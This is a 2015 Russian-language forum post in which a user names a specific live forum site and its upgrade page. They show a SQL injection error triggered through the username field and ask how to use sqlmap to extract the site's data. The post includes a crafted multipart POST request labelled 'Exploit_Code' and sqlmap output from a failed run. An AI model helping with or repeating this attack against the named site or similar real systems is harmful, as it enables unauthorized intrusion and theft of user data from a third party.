24.06.2015, 13:14
|
|
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
Провел на форуме:
54593
Репутация:
0
|
|
Есть форум http://forum.chindirchero.ru/
В поле обновления по адресу " http://forum.chindirchero.ru/upgrade/"
Если вбить \1\ и \1\ появляется ошибка:
Код:
SELECT m.*, g.* FROM ibf_members m LEFT JOIN ibf_groups g ON (g.g_id=m.mgroup) WHERE LOWER(name)='\1\'
Ñîîáùåíèå ñåðâåðà: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\1\'' at line 1
Êîä îøèáêè: 1064
Âðåìÿ: Wednesday 24th o June 2015 12:04:17 PM
Можно ли с помощью sqlmap выдернуть данные?
При составлении запроса и корректировки у меня sqlmap ругался на следующее и писал 404
Может, я неправильно составил запрос?
Код:
indows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100527 Firefox/3.6.4 (.NET
CLR 3.5.30729)'
Multipart-like data found in POST data. Do you want to process it? [Y/n/q] Y
[13:11:29] [INFO] testing connection to the target URL
[13:11:29] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and
make sure that everything is set up properly? [Y/n] Y
[13:11:30] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
Код:
POST /index.php HTTP/1.1
Content-Length: 586
Content-Type: multipart/form-data; boundary=----Exploit_Code
Cookie: PHPSESSID=e2fa5bb7d6518aa7b7f3a206febdcff0
Host: www.forum.chindirchero.ru/upgrade/index.php
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
------Exploit_Code
Content-Disposition: form-data; name="username"
\1\
------Exploit_Code
Content-Disposition: form-data; name="username"
\1\
------Exploit_Code
Content-Disposition: form-data; name="password"
g00dPa$$w0rD
------Exploit_Code--
|
|
|